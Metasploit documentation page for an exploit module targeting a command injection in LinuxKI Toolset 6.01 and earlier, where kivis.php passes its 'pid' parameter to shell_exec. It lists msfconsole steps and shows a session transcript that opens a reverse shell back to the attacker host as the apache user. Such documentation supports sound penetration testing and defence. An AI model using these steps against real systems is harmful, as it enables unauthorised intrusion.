metasploit-gs/documentation/modules/exploit/linux/http/linuxki_rce.md

Description

This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.

Vulnerable Application

LinuxKI Toolset <= 6.01

To test this application, you need to download the version 6.01 here. Do not forget to change this URL inside the Dockerfile with this one.

Verification Steps

1. Start msfconsole
2. use exploit/linux/http/linuxki_rce
3. set RHOST <target_ip>
4. set RPORT <target_port>
5. set LHOST <your_ip>
6. set LPORT <your_port>
7. Ideally run check
8. set LHOST <your_ip>
9. set LPORT <your_port>
10. Optional: set TARGETURI <path_to_linuxki> if target system uses a different path to LinuxKI
11. exploit

Scenarios

LinuxKI Toolset v6.01

msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
rhosts => 10.0.0.1
msf5 exploit(linux/http/linuxki_rce) > set rport 8080
rport => 8080
msf5 exploit(linux/http/linuxki_rce) > check
[+] 10.0.0.1:8080 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
lhost => 10.0.0.5
msf5 exploit(linux/http/linuxki_rce) > run

[*] Started reverse TCP handler on 10.0.0.5:4444
[*] Sending exploit...
[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300

id
uid=48(apache) gid=48(apache) groups=48(apache)